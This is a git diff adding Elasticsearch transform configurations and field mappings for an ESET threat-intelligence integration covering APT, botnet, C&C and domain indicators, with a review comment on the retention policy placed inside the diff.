diff --git a/packages/ti_eset/elasticsearch/transform/apt_latest_ioc/fields/base-fields.yml b/packages/ti_eset/elasticsearch/transform/apt_latest_ioc/fields/base-fields.yml new file mode 100644 index 00000000000..7c798f4534c --- /dev/null +++ b/packages/ti_eset/elasticsearch/transform/apt_latest_ioc/fields/base-fields.yml @@ -0,0 +1,12 @@ +- name: data_stream.type + type: constant_keyword + description: Data stream type. +- name: data_stream.dataset + type: constant_keyword + description: Data stream dataset. +- name: data_stream.namespace + type: constant_keyword + description: Data stream namespace. +- name: '@timestamp' + type: date + description: Event timestamp. diff --git a/packages/ti_eset/elasticsearch/transform/apt_latest_ioc/fields/ecs.yml b/packages/ti_eset/elasticsearch/transform/apt_latest_ioc/fields/ecs.yml new file mode 100644 index 00000000000..5162c5f7184 --- /dev/null +++ b/packages/ti_eset/elasticsearch/transform/apt_latest_ioc/fields/ecs.yml 
@@ -0,0 +1,92 @@
+- external: ecs
+ name: ecs.version
+- external: ecs
+ name: message
+- external: ecs
+ name: error.message
+- external: ecs
+ name: event.category
+- external: ecs
+ name: event.ingested
+- external: ecs
+ name: event.kind
+- external: ecs
+ name: event.original
+- external: ecs
+ name: event.created
+- external: ecs
+ name: tags
+- external: ecs
+ name: threat.indicator.name
+- external: ecs
+ name: threat.indicator.confidence
+- external: ecs
+ name: threat.indicator.url.original
+- external: ecs
+ name: threat.indicator.type
+- external: ecs
+ name: threat.indicator.description
+- external: ecs
+ name: threat.indicator.modified_at
+- external: ecs
+ name: threat.indicator.last_seen
+- external: ecs
+ name: threat.feed.name
+- external: ecs
+ name: threat.indicator.email.address
+- external: ecs
+ name: threat.indicator.file.hash.md5
+- external: ecs
+ name: threat.indicator.file.hash.sha1
+- external: ecs
+ name: threat.indicator.file.hash.sha256
+- external: ecs
+ name: threat.indicator.file.name
+- external: ecs
+ name: threat.indicator.provider
+- external: ecs
+ name: threat.indicator.url.domain
+- external: ecs
+ name: threat.indicator.url.path
+- external: ecs
+ name: threat.indicator.url.port
+- external: ecs
+ name: threat.indicator.url.scheme
+- external: ecs
+ name: threat.indicator.x509.issuer.common_name
+- external: ecs
+ name: threat.indicator.x509.issuer.country
+- external: ecs
+ name: threat.indicator.x509.issuer.distinguished_name
+- external: ecs
+ name: threat.indicator.x509.issuer.locality
+- external: ecs
+ name: threat.indicator.x509.issuer.organization
+- external: ecs
+ name: threat.indicator.x509.issuer.state_or_province
+- external: ecs
+ name: threat.indicator.x509.issuer.organizational_unit
+- external: ecs
+ name: threat.indicator.x509.not_after
+- external: ecs
+ name: threat.indicator.x509.not_before
+- external: ecs
+ name: threat.indicator.x509.serial_number
+- external: ecs
+ name: 
threat.indicator.x509.signature_algorithm
+- external: ecs
+ name: threat.indicator.x509.subject.common_name
+- external: ecs
+ name: threat.indicator.x509.subject.country
+- external: ecs
+ name: threat.indicator.x509.subject.distinguished_name
+- external: ecs
+ name: threat.indicator.x509.subject.locality
+- external: ecs
+ name: threat.indicator.x509.subject.organization
+- external: ecs
+ name: threat.indicator.x509.subject.state_or_province
+- external: ecs
+ name: threat.indicator.x509.subject.organizational_unit
+- external: ecs
+ name: threat.indicator.x509.version_number
diff --git a/packages/ti_eset/elasticsearch/transform/apt_latest_ioc/fields/fields.yml b/packages/ti_eset/elasticsearch/transform/apt_latest_ioc/fields/fields.yml
new file mode 100644
index 00000000000..3191e3eaf04
--- /dev/null
+++ b/packages/ti_eset/elasticsearch/transform/apt_latest_ioc/fields/fields.yml
@@ -0,0 +1,33 @@
+- name: eset
+ type: group
+ description: >
+ Fields for ESET Threat Intelligence
+
+ fields:
+ - name: id
+ type: keyword
+ description: The UID of the event object.
+ - name: category
+ type: keyword
+ description: >
+ Event category as defined by MISP.
+
+ - name: meta_category
+ type: keyword
+ description: >
+ Event sub-category as defined by MISP.
+
+ - name: name
+ type: keyword
+ description: >
+ Human readable name describing the event.
+
+ - name: type
+ type: keyword
+ description: >
+ Type of the event.
+
+ - name: valid_until
+ type: date
+ description: >-
+ Event expiration date.
diff --git a/packages/ti_eset/elasticsearch/transform/apt_latest_ioc/manifest.yml b/packages/ti_eset/elasticsearch/transform/apt_latest_ioc/manifest.yml
new file mode 100644
index 00000000000..f9e3e588fd4
--- /dev/null
+++ b/packages/ti_eset/elasticsearch/transform/apt_latest_ioc/manifest.yml
@@ -0,0 +1,18 @@
+destination_index_template:
+ mappings:
+ date_detection: false
+ dynamic: true
+ dynamic_templates:
+ - strings_as_keyword:
+ mapping:
+ ignore_above: 1024
+ type: keyword
+ match_mapping_type: string
+ settings:
+ index:
+ sort:
+ field:
+ - '@timestamp'
+ order:
+ - desc
+start: true
diff --git a/packages/ti_eset/elasticsearch/transform/apt_latest_ioc/transform.yml b/packages/ti_eset/elasticsearch/transform/apt_latest_ioc/transform.yml
new file mode 100644
index 00000000000..c37dbd7a160
--- /dev/null
+++ b/packages/ti_eset/elasticsearch/transform/apt_latest_ioc/transform.yml
@@ -0,0 +1,26 @@
+_meta:
+ fleet_transform_version: 0.1.0
+ managed: true
+description: Latest ESET APT IoC data
+dest:
+ index: logs-ti_eset_latest.dest_apt-1
+ aliases:
+ - alias: logs-ti_eset_latest.apt
+ move_on_creation: true
+frequency: 30s
+latest:
+ sort: '@timestamp'
+ unique_key:
+ - event.dataset
+ - eset.id
+retention_policy:
+ time:
+ field: eset.valid_until
+ max_age: 1m
+source:
+ index:
+ - logs-ti_eset.apt-*
+sync:
+ time:
+ delay: 120s
+ field: event.ingested
diff --git a/packages/ti_eset/elasticsearch/transform/botnet_latest_ioc/fields/agent.yml b/packages/ti_eset/elasticsearch/transform/botnet_latest_ioc/fields/agent.yml
new file mode 100644
index 00000000000..845b84ed9c0
--- /dev/null
+++ b/packages/ti_eset/elasticsearch/transform/botnet_latest_ioc/fields/agent.yml
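Review bot: The `retention_policy` block keys expiry on `eset.valid_until`, and as far as I can tell a document in the latest index that arrives without that field is never matched by the `max_age` range and therefore remains in `logs-ti_eset_latest.dest_apt-1` indefinitely; nothing in the hunk records that the ingest side must always populate it. A comment beside `field: eset.valid_until`, e.g. `# documents lacking eset.valid_until are never deleted by this policy; the ingest pipeline must set it on every indicator`, would make that dependency visible to whoever edits the pipeline later. The same applies to the botnet_latest_ioc, cc_latest_ioc and domains_latest_ioc transform.yml hunks, which differ only in index and alias names.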
@@ -0,0 +1,201 @@ +- name: cloud + title: Cloud + group: 2 + description: Fields related to the cloud or infrastructure the events are coming from. + footnote: 'Examples: If Metricbeat is running on an EC2 host and fetches data from its host, the cloud info contains the data about this machine. If Metricbeat runs on a remote machine outside the cloud and fetches data from a service running in the cloud, the field contains cloud data from the machine the service is running on.' + type: group + fields: + - name: account.id + level: extended + type: keyword + ignore_above: 1024 + description: 'The cloud account or organization id used to identify different entities in a multi-tenant environment. + + Examples: AWS account id, Google Cloud ORG Id, or other unique identifier.' + example: 666777888999 + - name: availability_zone + level: extended + type: keyword + ignore_above: 1024 + description: Availability zone in which this host is running. + example: us-east-1c + - name: instance.id + level: extended + type: keyword + ignore_above: 1024 + description: Instance ID of the host machine. + example: i-1234567890abcdef0 + - name: instance.name + level: extended + type: keyword + ignore_above: 1024 + description: Instance name of the host machine. + - name: machine.type + level: extended + type: keyword + ignore_above: 1024 + description: Machine type of the host machine. + example: t2.medium + - name: provider + level: extended + type: keyword + ignore_above: 1024 + description: Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. + example: aws + - name: region + level: extended + type: keyword + ignore_above: 1024 + description: Region in which this host is running. + example: us-east-1 + - name: project.id + type: keyword + description: Name of the project in Google Cloud. + - name: image.id + type: keyword + description: Image ID for the cloud instance. 
+- name: container + title: Container + group: 2 + description: 'Container fields are used for meta information about the specific container that is the source of information. + + These fields help correlate data based containers from any runtime.' + type: group + fields: + - name: id + level: core + type: keyword + ignore_above: 1024 + description: Unique container id. + - name: image.name + level: extended + type: keyword + ignore_above: 1024 + description: Name of the image the container was built on. + - name: labels + level: extended + type: object + object_type: keyword + description: Image labels. + - name: name + level: extended + type: keyword + ignore_above: 1024 + description: Container name. +- name: host + title: Host + group: 2 + description: 'A host is defined as a general computing instance. + + ECS host.* fields should be populated with details about the host on which the event happened, or from which the measurement was taken. Host types include hardware, virtual machines, Docker containers, and Kubernetes nodes.' + type: group + fields: + - name: architecture + level: core + type: keyword + ignore_above: 1024 + description: Operating system architecture. + example: x86_64 + - name: domain + level: extended + type: keyword + ignore_above: 1024 + description: 'Name of the domain of which the host is a member. + + For example, on Windows this could be the host''s Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host''s LDAP provider.' + example: CONTOSO + default_field: false + - name: hostname + level: core + type: keyword + ignore_above: 1024 + description: 'Hostname of the host. + + It normally contains what the `hostname` command returns on the host machine.' + - name: id + level: core + type: keyword + ignore_above: 1024 + description: 'Unique host id. + + As hostname is not always unique, use values that are meaningful in your environment. + + Example: The current usage of `beat.name`.' 
+ - name: ip + level: core + type: ip + description: Host ip addresses. + - name: mac + level: core + type: keyword + ignore_above: 1024 + description: Host mac addresses. + - name: name + level: core + type: keyword + ignore_above: 1024 + description: 'Name of the host. + + It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use.' + - name: os.family + level: extended + type: keyword + ignore_above: 1024 + description: OS family (such as redhat, debian, freebsd, windows). + example: debian + - name: os.kernel + level: extended + type: keyword + ignore_above: 1024 + description: Operating system kernel version as a raw string. + example: 4.4.0-112-generic + - name: os.name + level: extended + type: keyword + ignore_above: 1024 + multi_fields: + - name: text + type: text + norms: false + default_field: false + description: Operating system name, without the version. + example: Mac OS X + - name: os.platform + level: extended + type: keyword + ignore_above: 1024 + description: Operating system platform (such centos, ubuntu, windows). + example: darwin + - name: os.version + level: extended + type: keyword + ignore_above: 1024 + description: Operating system version as a raw string. + example: 10.14.1 + - name: type + level: core + type: keyword + ignore_above: 1024 + description: 'Type of host. + + For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment.' + - name: containerized + type: boolean + description: > + If the host is a container. + + - name: os.build + type: keyword + example: "18D109" + description: > + OS build information. + + - name: os.codename + type: keyword + example: "stretch" + description: > + OS codename, if any. + +- name: input.type + type: keyword + description: Input type. 
diff --git a/packages/ti_eset/elasticsearch/transform/botnet_latest_ioc/fields/base-fields.yml b/packages/ti_eset/elasticsearch/transform/botnet_latest_ioc/fields/base-fields.yml
new file mode 100644
index 00000000000..7c798f4534c
--- /dev/null
+++ b/packages/ti_eset/elasticsearch/transform/botnet_latest_ioc/fields/base-fields.yml
@@ -0,0 +1,12 @@
+- name: data_stream.type
+ type: constant_keyword
+ description: Data stream type.
+- name: data_stream.dataset
+ type: constant_keyword
+ description: Data stream dataset.
+- name: data_stream.namespace
+ type: constant_keyword
+ description: Data stream namespace.
+- name: '@timestamp'
+ type: date
+ description: Event timestamp.
diff --git a/packages/ti_eset/elasticsearch/transform/botnet_latest_ioc/fields/ecs.yml b/packages/ti_eset/elasticsearch/transform/botnet_latest_ioc/fields/ecs.yml
new file mode 100644
index 00000000000..43534883f1c
--- /dev/null
+++ b/packages/ti_eset/elasticsearch/transform/botnet_latest_ioc/fields/ecs.yml
@@ -0,0 +1,42 @@
+- external: ecs
+ name: ecs.version
+- external: ecs
+ name: message
+- external: ecs
+ name: error.message
+- external: ecs
+ name: event.category
+- external: ecs
+ name: event.ingested
+- external: ecs
+ name: event.kind
+- external: ecs
+ name: event.original
+- external: ecs
+ name: event.created
+- external: ecs
+ name: tags
+- external: ecs
+ name: threat.indicator.name
+- external: ecs
+ name: threat.indicator.confidence
+- external: ecs
+ name: threat.indicator.provider
+- external: ecs
+ name: threat.indicator.url.original
+- external: ecs
+ name: threat.indicator.file.hash.md5
+- external: ecs
+ name: threat.indicator.file.hash.sha1
+- external: ecs
+ name: threat.indicator.file.hash.sha256
+- external: ecs
+ name: threat.indicator.type
+- external: ecs
+ name: threat.indicator.description
+- external: ecs
+ name: threat.indicator.modified_at
+- external: ecs
+ name: threat.indicator.last_seen
+- external: ecs
+ name: threat.feed.name
diff --git a/packages/ti_eset/elasticsearch/transform/botnet_latest_ioc/fields/fields.yml b/packages/ti_eset/elasticsearch/transform/botnet_latest_ioc/fields/fields.yml
new file mode 100644
index 00000000000..18accf0bda4
--- /dev/null
+++ b/packages/ti_eset/elasticsearch/transform/botnet_latest_ioc/fields/fields.yml
@@ -0,0 +1,17 @@
+- name: eset
+ type: group
+ description: >
+ Fields for ESET Threat Intelligence
+
+ fields:
+ - name: id
+ type: keyword
+ description: The UID of the event object.
+ - name: valid_until
+ type: date
+ description: >-
+ Event expiration date.
+ - name: labels
+ type: keyword
+ description: >-
+ Threat labels.
diff --git a/packages/ti_eset/elasticsearch/transform/botnet_latest_ioc/manifest.yml b/packages/ti_eset/elasticsearch/transform/botnet_latest_ioc/manifest.yml
new file mode 100644
index 00000000000..f9e3e588fd4
--- /dev/null
+++ b/packages/ti_eset/elasticsearch/transform/botnet_latest_ioc/manifest.yml
@@ -0,0 +1,18 @@
+destination_index_template:
+ mappings:
+ date_detection: false
+ dynamic: true
+ dynamic_templates:
+ - strings_as_keyword:
+ mapping:
+ ignore_above: 1024
+ type: keyword
+ match_mapping_type: string
+ settings:
+ index:
+ sort:
+ field:
+ - '@timestamp'
+ order:
+ - desc
+start: true
diff --git a/packages/ti_eset/elasticsearch/transform/botnet_latest_ioc/transform.yml b/packages/ti_eset/elasticsearch/transform/botnet_latest_ioc/transform.yml
new file mode 100644
index 00000000000..e7cbc7ea9fb
--- /dev/null
+++ b/packages/ti_eset/elasticsearch/transform/botnet_latest_ioc/transform.yml
@@ -0,0 +1,26 @@
+_meta:
+ fleet_transform_version: 0.1.0
+ managed: true
+description: Latest ESET Botnet IoC data
+dest:
+ index: logs-ti_eset_latest.dest_botnet-1
+ aliases:
+ - alias: logs-ti_eset_latest.botnet
+ move_on_creation: true
+frequency: 30s
+latest:
+ sort: '@timestamp'
+ unique_key:
+ - event.dataset
+ - eset.id
+retention_policy:
+ time:
+ field: eset.valid_until
+ max_age: 1m
+source:
+ index:
+ - logs-ti_eset.botnet-*
+sync:
+ time:
+ delay: 120s
+ field: event.ingested
diff --git a/packages/ti_eset/elasticsearch/transform/cc_latest_ioc/fields/agent.yml b/packages/ti_eset/elasticsearch/transform/cc_latest_ioc/fields/agent.yml
new file mode 100644
index 00000000000..845b84ed9c0
--- /dev/null
+++ b/packages/ti_eset/elasticsearch/transform/cc_latest_ioc/fields/agent.yml
@@ -0,0 +1,201 @@ +- name: cloud + title: Cloud + group: 2 + description: Fields related to the cloud or infrastructure the events are coming from. + footnote: 'Examples: If Metricbeat is running on an EC2 host and fetches data from its host, the cloud info contains the data about this machine. If Metricbeat runs on a remote machine outside the cloud and fetches data from a service running in the cloud, the field contains cloud data from the machine the service is running on.' + type: group + fields: + - name: account.id + level: extended + type: keyword + ignore_above: 1024 + description: 'The cloud account or organization id used to identify different entities in a multi-tenant environment. + + Examples: AWS account id, Google Cloud ORG Id, or other unique identifier.' + example: 666777888999 + - name: availability_zone + level: extended + type: keyword + ignore_above: 1024 + description: Availability zone in which this host is running. + example: us-east-1c + - name: instance.id + level: extended + type: keyword + ignore_above: 1024 + description: Instance ID of the host machine. + example: i-1234567890abcdef0 + - name: instance.name + level: extended + type: keyword + ignore_above: 1024 + description: Instance name of the host machine. + - name: machine.type + level: extended + type: keyword + ignore_above: 1024 + description: Machine type of the host machine. + example: t2.medium + - name: provider + level: extended + type: keyword + ignore_above: 1024 + description: Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. + example: aws + - name: region + level: extended + type: keyword + ignore_above: 1024 + description: Region in which this host is running. + example: us-east-1 + - name: project.id + type: keyword + description: Name of the project in Google Cloud. + - name: image.id + type: keyword + description: Image ID for the cloud instance. 
+- name: container + title: Container + group: 2 + description: 'Container fields are used for meta information about the specific container that is the source of information. + + These fields help correlate data based containers from any runtime.' + type: group + fields: + - name: id + level: core + type: keyword + ignore_above: 1024 + description: Unique container id. + - name: image.name + level: extended + type: keyword + ignore_above: 1024 + description: Name of the image the container was built on. + - name: labels + level: extended + type: object + object_type: keyword + description: Image labels. + - name: name + level: extended + type: keyword + ignore_above: 1024 + description: Container name. +- name: host + title: Host + group: 2 + description: 'A host is defined as a general computing instance. + + ECS host.* fields should be populated with details about the host on which the event happened, or from which the measurement was taken. Host types include hardware, virtual machines, Docker containers, and Kubernetes nodes.' + type: group + fields: + - name: architecture + level: core + type: keyword + ignore_above: 1024 + description: Operating system architecture. + example: x86_64 + - name: domain + level: extended + type: keyword + ignore_above: 1024 + description: 'Name of the domain of which the host is a member. + + For example, on Windows this could be the host''s Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host''s LDAP provider.' + example: CONTOSO + default_field: false + - name: hostname + level: core + type: keyword + ignore_above: 1024 + description: 'Hostname of the host. + + It normally contains what the `hostname` command returns on the host machine.' + - name: id + level: core + type: keyword + ignore_above: 1024 + description: 'Unique host id. + + As hostname is not always unique, use values that are meaningful in your environment. + + Example: The current usage of `beat.name`.' 
+ - name: ip + level: core + type: ip + description: Host ip addresses. + - name: mac + level: core + type: keyword + ignore_above: 1024 + description: Host mac addresses. + - name: name + level: core + type: keyword + ignore_above: 1024 + description: 'Name of the host. + + It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use.' + - name: os.family + level: extended + type: keyword + ignore_above: 1024 + description: OS family (such as redhat, debian, freebsd, windows). + example: debian + - name: os.kernel + level: extended + type: keyword + ignore_above: 1024 + description: Operating system kernel version as a raw string. + example: 4.4.0-112-generic + - name: os.name + level: extended + type: keyword + ignore_above: 1024 + multi_fields: + - name: text + type: text + norms: false + default_field: false + description: Operating system name, without the version. + example: Mac OS X + - name: os.platform + level: extended + type: keyword + ignore_above: 1024 + description: Operating system platform (such centos, ubuntu, windows). + example: darwin + - name: os.version + level: extended + type: keyword + ignore_above: 1024 + description: Operating system version as a raw string. + example: 10.14.1 + - name: type + level: core + type: keyword + ignore_above: 1024 + description: 'Type of host. + + For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment.' + - name: containerized + type: boolean + description: > + If the host is a container. + + - name: os.build + type: keyword + example: "18D109" + description: > + OS build information. + + - name: os.codename + type: keyword + example: "stretch" + description: > + OS codename, if any. + +- name: input.type + type: keyword + description: Input type. 
diff --git a/packages/ti_eset/elasticsearch/transform/cc_latest_ioc/fields/base-fields.yml b/packages/ti_eset/elasticsearch/transform/cc_latest_ioc/fields/base-fields.yml
new file mode 100644
index 00000000000..7c798f4534c
--- /dev/null
+++ b/packages/ti_eset/elasticsearch/transform/cc_latest_ioc/fields/base-fields.yml
@@ -0,0 +1,12 @@
+- name: data_stream.type
+ type: constant_keyword
+ description: Data stream type.
+- name: data_stream.dataset
+ type: constant_keyword
+ description: Data stream dataset.
+- name: data_stream.namespace
+ type: constant_keyword
+ description: Data stream namespace.
+- name: '@timestamp'
+ type: date
+ description: Event timestamp.
diff --git a/packages/ti_eset/elasticsearch/transform/cc_latest_ioc/fields/ecs.yml b/packages/ti_eset/elasticsearch/transform/cc_latest_ioc/fields/ecs.yml
new file mode 100644
index 00000000000..d3f9633c4c9
--- /dev/null
+++ b/packages/ti_eset/elasticsearch/transform/cc_latest_ioc/fields/ecs.yml
@@ -0,0 +1,36 @@
+- external: ecs
+ name: ecs.version
+- external: ecs
+ name: message
+- external: ecs
+ name: error.message
+- external: ecs
+ name: event.category
+- external: ecs
+ name: event.ingested
+- external: ecs
+ name: event.kind
+- external: ecs
+ name: event.original
+- external: ecs
+ name: event.created
+- external: ecs
+ name: tags
+- external: ecs
+ name: threat.indicator.name
+- external: ecs
+ name: threat.indicator.confidence
+- external: ecs
+ name: threat.indicator.provider
+- external: ecs
+ name: threat.indicator.url.original
+- external: ecs
+ name: threat.indicator.type
+- external: ecs
+ name: threat.indicator.description
+- external: ecs
+ name: threat.indicator.modified_at
+- external: ecs
+ name: threat.indicator.last_seen
+- external: ecs
+ name: threat.feed.name
diff --git a/packages/ti_eset/elasticsearch/transform/cc_latest_ioc/fields/fields.yml b/packages/ti_eset/elasticsearch/transform/cc_latest_ioc/fields/fields.yml
new file mode 100644
index 00000000000..18accf0bda4
--- /dev/null
+++ b/packages/ti_eset/elasticsearch/transform/cc_latest_ioc/fields/fields.yml
@@ -0,0 +1,17 @@
+- name: eset
+ type: group
+ description: >
+ Fields for ESET Threat Intelligence
+
+ fields:
+ - name: id
+ type: keyword
+ description: The UID of the event object.
+ - name: valid_until
+ type: date
+ description: >-
+ Event expiration date.
+ - name: labels
+ type: keyword
+ description: >-
+ Threat labels.
diff --git a/packages/ti_eset/elasticsearch/transform/cc_latest_ioc/manifest.yml b/packages/ti_eset/elasticsearch/transform/cc_latest_ioc/manifest.yml
new file mode 100644
index 00000000000..f9e3e588fd4
--- /dev/null
+++ b/packages/ti_eset/elasticsearch/transform/cc_latest_ioc/manifest.yml
@@ -0,0 +1,18 @@
+destination_index_template:
+ mappings:
+ date_detection: false
+ dynamic: true
+ dynamic_templates:
+ - strings_as_keyword:
+ mapping:
+ ignore_above: 1024
+ type: keyword
+ match_mapping_type: string
+ settings:
+ index:
+ sort:
+ field:
+ - '@timestamp'
+ order:
+ - desc
+start: true
diff --git a/packages/ti_eset/elasticsearch/transform/cc_latest_ioc/transform.yml b/packages/ti_eset/elasticsearch/transform/cc_latest_ioc/transform.yml
new file mode 100644
index 00000000000..b87d72909c8
--- /dev/null
+++ b/packages/ti_eset/elasticsearch/transform/cc_latest_ioc/transform.yml
@@ -0,0 +1,26 @@
+_meta:
+ fleet_transform_version: 0.1.0
+ managed: true
+description: Latest ESET C&C IoC data
+dest:
+ index: logs-ti_eset_latest.dest_cc-1
+ aliases:
+ - alias: logs-ti_eset_latest.cc
+ move_on_creation: true
+frequency: 30s
+latest:
+ sort: '@timestamp'
+ unique_key:
+ - event.dataset
+ - eset.id
+retention_policy:
+ time:
+ field: eset.valid_until
+ max_age: 1m
+source:
+ index:
+ - logs-ti_eset.cc-*
+sync:
+ time:
+ delay: 120s
+ field: event.ingested
diff --git a/packages/ti_eset/elasticsearch/transform/domains_latest_ioc/fields/agent.yml b/packages/ti_eset/elasticsearch/transform/domains_latest_ioc/fields/agent.yml
new file mode 100644
index 00000000000..845b84ed9c0
--- /dev/null
+++ b/packages/ti_eset/elasticsearch/transform/domains_latest_ioc/fields/agent.yml
@@ -0,0 +1,201 @@ +- name: cloud + title: Cloud + group: 2 + description: Fields related to the cloud or infrastructure the events are coming from. + footnote: 'Examples: If Metricbeat is running on an EC2 host and fetches data from its host, the cloud info contains the data about this machine. If Metricbeat runs on a remote machine outside the cloud and fetches data from a service running in the cloud, the field contains cloud data from the machine the service is running on.' + type: group + fields: + - name: account.id + level: extended + type: keyword + ignore_above: 1024 + description: 'The cloud account or organization id used to identify different entities in a multi-tenant environment. + + Examples: AWS account id, Google Cloud ORG Id, or other unique identifier.' + example: 666777888999 + - name: availability_zone + level: extended + type: keyword + ignore_above: 1024 + description: Availability zone in which this host is running. + example: us-east-1c + - name: instance.id + level: extended + type: keyword + ignore_above: 1024 + description: Instance ID of the host machine. + example: i-1234567890abcdef0 + - name: instance.name + level: extended + type: keyword + ignore_above: 1024 + description: Instance name of the host machine. + - name: machine.type + level: extended + type: keyword + ignore_above: 1024 + description: Machine type of the host machine. + example: t2.medium + - name: provider + level: extended + type: keyword + ignore_above: 1024 + description: Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. + example: aws + - name: region + level: extended + type: keyword + ignore_above: 1024 + description: Region in which this host is running. + example: us-east-1 + - name: project.id + type: keyword + description: Name of the project in Google Cloud. + - name: image.id + type: keyword + description: Image ID for the cloud instance. 
+- name: container + title: Container + group: 2 + description: 'Container fields are used for meta information about the specific container that is the source of information. + + These fields help correlate data based containers from any runtime.' + type: group + fields: + - name: id + level: core + type: keyword + ignore_above: 1024 + description: Unique container id. + - name: image.name + level: extended + type: keyword + ignore_above: 1024 + description: Name of the image the container was built on. + - name: labels + level: extended + type: object + object_type: keyword + description: Image labels. + - name: name + level: extended + type: keyword + ignore_above: 1024 + description: Container name. +- name: host + title: Host + group: 2 + description: 'A host is defined as a general computing instance. + + ECS host.* fields should be populated with details about the host on which the event happened, or from which the measurement was taken. Host types include hardware, virtual machines, Docker containers, and Kubernetes nodes.' + type: group + fields: + - name: architecture + level: core + type: keyword + ignore_above: 1024 + description: Operating system architecture. + example: x86_64 + - name: domain + level: extended + type: keyword + ignore_above: 1024 + description: 'Name of the domain of which the host is a member. + + For example, on Windows this could be the host''s Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host''s LDAP provider.' + example: CONTOSO + default_field: false + - name: hostname + level: core + type: keyword + ignore_above: 1024 + description: 'Hostname of the host. + + It normally contains what the `hostname` command returns on the host machine.' + - name: id + level: core + type: keyword + ignore_above: 1024 + description: 'Unique host id. + + As hostname is not always unique, use values that are meaningful in your environment. + + Example: The current usage of `beat.name`.' 
+ - name: ip + level: core + type: ip + description: Host ip addresses. + - name: mac + level: core + type: keyword + ignore_above: 1024 + description: Host mac addresses. + - name: name + level: core + type: keyword + ignore_above: 1024 + description: 'Name of the host. + + It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use.' + - name: os.family + level: extended + type: keyword + ignore_above: 1024 + description: OS family (such as redhat, debian, freebsd, windows). + example: debian + - name: os.kernel + level: extended + type: keyword + ignore_above: 1024 + description: Operating system kernel version as a raw string. + example: 4.4.0-112-generic + - name: os.name + level: extended + type: keyword + ignore_above: 1024 + multi_fields: + - name: text + type: text + norms: false + default_field: false + description: Operating system name, without the version. + example: Mac OS X + - name: os.platform + level: extended + type: keyword + ignore_above: 1024 + description: Operating system platform (such centos, ubuntu, windows). + example: darwin + - name: os.version + level: extended + type: keyword + ignore_above: 1024 + description: Operating system version as a raw string. + example: 10.14.1 + - name: type + level: core + type: keyword + ignore_above: 1024 + description: 'Type of host. + + For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment.' + - name: containerized + type: boolean + description: > + If the host is a container. + + - name: os.build + type: keyword + example: "18D109" + description: > + OS build information. + + - name: os.codename + type: keyword + example: "stretch" + description: > + OS codename, if any. + +- name: input.type + type: keyword + description: Input type. 
diff --git a/packages/ti_eset/elasticsearch/transform/domains_latest_ioc/fields/base-fields.yml b/packages/ti_eset/elasticsearch/transform/domains_latest_ioc/fields/base-fields.yml
new file mode 100644
index 00000000000..7c798f4534c
--- /dev/null
+++ b/packages/ti_eset/elasticsearch/transform/domains_latest_ioc/fields/base-fields.yml
@@ -0,0 +1,12 @@
+- name: data_stream.type
+ type: constant_keyword
+ description: Data stream type.
+- name: data_stream.dataset
+ type: constant_keyword
+ description: Data stream dataset.
+- name: data_stream.namespace
+ type: constant_keyword
+ description: Data stream namespace.
+- name: '@timestamp'
+ type: date
+ description: Event timestamp.
diff --git a/packages/ti_eset/elasticsearch/transform/domains_latest_ioc/fields/ecs.yml b/packages/ti_eset/elasticsearch/transform/domains_latest_ioc/fields/ecs.yml
new file mode 100644
index 00000000000..f127a34e100
--- /dev/null
+++ b/packages/ti_eset/elasticsearch/transform/domains_latest_ioc/fields/ecs.yml
@@ -0,0 +1,38 @@
+- external: ecs
+ name: ecs.version
+- external: ecs
+ name: message
+- external: ecs
+ name: error.message
+- external: ecs
+ name: event.category
+- external: ecs
+ name: event.ingested
+- external: ecs
+ name: event.kind
+- external: ecs
+ name: event.original
+- external: ecs
+ name: event.created
+- external: ecs
+ name: tags
+- external: ecs
+ name: threat.indicator.name
+- external: ecs
+ name: threat.indicator.confidence
+- external: ecs
+ name: threat.indicator.provider
+- external: ecs
+ name: threat.indicator.url.original
+- external: ecs
+ name: threat.indicator.url.domain
+- external: ecs
+ name: threat.indicator.type
+- external: ecs
+ name: threat.indicator.description
+- external: ecs
+ name: threat.indicator.modified_at
+- external: ecs
+ name: threat.indicator.last_seen
+- external: ecs
+ name: threat.feed.name
diff --git a/packages/ti_eset/elasticsearch/transform/domains_latest_ioc/fields/fields.yml b/packages/ti_eset/elasticsearch/transform/domains_latest_ioc/fields/fields.yml
new file mode 100644
index 00000000000..18accf0bda4
--- /dev/null
+++ b/packages/ti_eset/elasticsearch/transform/domains_latest_ioc/fields/fields.yml
@@ -0,0 +1,17 @@
+- name: eset
+ type: group
+ description: >
+ Fields for ESET Threat Intelligence
+
+ fields:
+ - name: id
+ type: keyword
+ description: The UID of the event object.
+ - name: valid_until
+ type: date
+ description: >-
+ Event expiration date.
+ - name: labels
+ type: keyword
+ description: >-
+ Threat labels.
diff --git a/packages/ti_eset/elasticsearch/transform/domains_latest_ioc/manifest.yml b/packages/ti_eset/elasticsearch/transform/domains_latest_ioc/manifest.yml
new file mode 100644
index 00000000000..f9e3e588fd4
--- /dev/null
+++ b/packages/ti_eset/elasticsearch/transform/domains_latest_ioc/manifest.yml
@@ -0,0 +1,18 @@
+destination_index_template:
+ mappings:
+ date_detection: false
+ dynamic: true
+ dynamic_templates:
+ - strings_as_keyword:
+ mapping:
+ ignore_above: 1024
+ type: keyword
+ match_mapping_type: string
+ settings:
+ index:
+ sort:
+ field:
+ - '@timestamp'
+ order:
+ - desc
+start: true
diff --git a/packages/ti_eset/elasticsearch/transform/domains_latest_ioc/transform.yml b/packages/ti_eset/elasticsearch/transform/domains_latest_ioc/transform.yml
new file mode 100644
index 00000000000..1b2615a9972
--- /dev/null
+++ b/packages/ti_eset/elasticsearch/transform/domains_latest_ioc/transform.yml
@@ -0,0 +1,26 @@
+_meta:
+ fleet_transform_version: 0.1.0
+ managed: true
+description: Latest ESET Domains IoC data
+dest:
+ index: logs-ti_eset_latest.dest_domains-1
+ aliases:
